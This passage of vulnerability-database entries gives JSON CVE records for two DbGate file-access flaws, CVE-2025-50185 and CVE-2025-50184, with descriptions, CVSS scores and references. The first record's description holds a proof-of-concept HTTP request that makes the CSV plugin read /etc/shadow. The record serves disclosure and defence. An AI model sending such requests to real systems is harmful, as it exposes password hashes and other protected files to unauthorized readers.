"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003c= 6.6.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n\n\n\nLines of the file being returned:\n"
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-29",
"description": "CWE-29: Path Traversal: \u0027..filename\u0027",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-26T03:34:43.481Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
},
{
"name": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"
}
],
"source": {
"advisory": "GHSA-7x75-fmx7-q6h9",
"discovery": "UNKNOWN"
},
"title": "DbGate allows Unauthorized File Access via CSV Plugin"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-50185",
"datePublished": "2025-07-26T03:34:43.481Z",
"dateReserved": "2025-06-13T19:17:51.726Z",
"dateUpdated": "2025-07-28T18:55:40.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-50184 (GCVE-0-2025-50184)
Vulnerability from cvelistv5 – Published: 2025-07-26 03:27 – Updated: 2025-07-28 15:58
VLAI
Title
DbGate allows for File Traversal via file parameter
Summary
DbGate is cross-platform database manager. In versions 6.4.3-premium-beta.5 and below, DbGate is vulnerable to a directory traversal flaw. The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data. This is fixed in version 6.4.3-beta.8.
Severity
SSVC
Exploitation: none
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-29 - Path Traversal: '..filename'
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/commit/18b11df67… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-50184",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-28T15:58:11.656295Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-28T15:58:17.489Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003c 6.4.3-beta.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. In versions 6.4.3-premium-beta.5 and below, DbGate is vulnerable to a directory traversal flaw. The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data. This is fixed in version 6.4.3-beta.8."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-29",
"description": "CWE-29: Path Traversal: \u0027..filename\u0027",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-26T03:27:05.690Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-2fp9-29gv-p5gm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-2fp9-29gv-p5gm"
},
{
"name": "https://github.com/dbgate/dbgate/commit/18b11df672b5a887bc17a6b9fdd13f9742c8f98e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/commit/18b11df672b5a887bc17a6b9fdd13f9742c8f98e"
}
],
"source": {
"advisory": "GHSA-2fp9-29gv-p5gm",
"discovery": "UNKNOWN"
},
"title": "DbGate allows for File Traversal via file parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-50184",
"datePublished": "2025-07-26T03:27:05.690Z",
"dateReserved": "2025-06-13T19:17:51.726Z",
"dateUpdated": "2025-07-28T15:58:17.489Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}